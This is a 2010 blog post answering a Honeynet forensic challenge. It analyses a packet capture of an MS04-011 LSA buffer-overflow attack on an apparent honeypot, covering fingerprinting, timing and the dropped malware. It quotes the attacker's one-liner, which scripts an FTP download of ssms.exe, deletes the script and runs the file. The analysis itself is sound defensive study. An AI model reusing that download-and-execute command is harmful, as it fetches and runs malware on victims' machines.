Tuesday, February 2, 2010

Honeynet Challenge #1 - Answers

The deadline was yesterday, so I think I'm ok posting my answers. Not sure if these are correct or not, but this is what I submitted. If anyone has any questions let me know. Again, this was a fun exercise:

Question 1. Which systems (i.e. IP addresses) are involved?

Tools Used: Satori, NetworkMiner, and Wireshark
192.150.11.111 – End system
98.114.205.102 - Attacker

-----

Question 2. What can you find out about the attacking host (e.g., where is it located)?

Tools Used: WHOIS, Wireshark

TTL – 113, since appears to be a windows box, 15 hops away.

According to: http://www.ipaddresslocation.org/ip-address-locator.php

They are most likely located in/around Southampton Pennsylvania, which is where the local Verizon Internet Services office is located at least.

Attack System appears to be a Windows 2000 system (TTL puts it as Windows (typically) and TCP fingerprint put it as a Windows 2000, XP or 2003 box and SMB puts it as Windows 2000 and SMB is the most reliable of those mentioned normally).

-----

Question 3. How many TCP sessions are contained in the dump file?

Tools Used: NetworkMiner, verified with Wireshark

5 total:
- 4 from 98.114.205.102
- 1 from 192.150.11.111

-----

Question 4. How long did it take to perform the attack?

Tools Used: wireshark Awarded Points:

It depends on what part you consider the actual attack:

Max of 16.2 seconds from the first packet to the last packet in the capture. Most of the time is actually FTP’ing a file.

Within the first 2 seconds the Buffer Overflow has already taken place. The next 14 seconds are sending the command to the system and FTP’ing the file.

-----

Question 5. Which operating system was targeted by the attack? And which service? Which vulnerability?

Tools Used: Satori, wireshark

192.150.11.111

2 competing fingerprints:

* Based on TTL and TCP fingerprinting it appears to be a Linux box, most likely 2.6 kernel.
* SMB packets on the otherhand claim it is on the VIDCAM Domain and running Windows 5.1 (packet 16 & 19)

Based on the attack that appears to be happening against DsRoleUpgradeDownlevelServer I’d say it is an XP system; Trying to exploit MS04-011, targeting the Windows LSA Service.

-----

Question 6. Can you sketch an overview of the general actions performed by the attacker?

Tools Used: wireshark

Authenticates as a null user to ipc$, peforms a DsRoleUpgradeDownlevelServer Buffer Overflow. Once exploited forces the system to FTP a file.

First they dump these commands in the file ‘o’:

open 0.0.0.0 8884

user 1 1

get ssms.exe

Then they do:

ftp –n –s:o (Suppresses auto-login and reads data in from the ‘o’ file)

Delete the ‘o’ file to make sure nobody can see what they did, forcing it quite mode and deleting of read only files, just in case.

Then launch ssms.exe

-----

Question 7. What specific vulnerability was attacked?

MS04-011, good writeup at:

http://research.eeye.com/html/advisories/published/AD20040413C.html

-----

Question 8. What actions does the shellcode perform? Pls list the shellcode

Tools Used: wireshark, trace tcp conversation

It targets DSRoleUpgradeDownLevelServer, does a buffer overflow of a lot of 0x31, or 1’s in ascii. As soon as that is done it starts a new TCP conversation and does this (more info back in question #6)

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe

ssms.exe

It appears to call ssms.exe twice, not sure if that is by design or due to a bug???

-----

Question 9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?

Tools Used: Satori (http://myweb.cableone.net/xnih)

Yes. Go back to #5. TCP fingerprint shows the box as Linux 2.6, SMB shows the box as Windows XP. The TTL can be tweaked on windows, but the rest of the TCP fingerprint is hard to modify, though there are some tweaks that can be done that may allow this.

-----

Question 10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge)

Smss.exe, may be W32/Spybot-MP worm and IRC backdoor, but without analysis it is hard to say. That is just a guess based on the name and the name alone.

-----

Question 11. Do you think this is a manual or an automated attack? Why?

Automated, it only took 16 seconds from start to finish. Typing this sentence up took that long with a few typo’s! Not to mention, most of that 16.2 seconds was downloading the ssms.exe file. So while it is possible someone sat there and did it, due to the quickness in which it took place it seems unlikely.

No comments: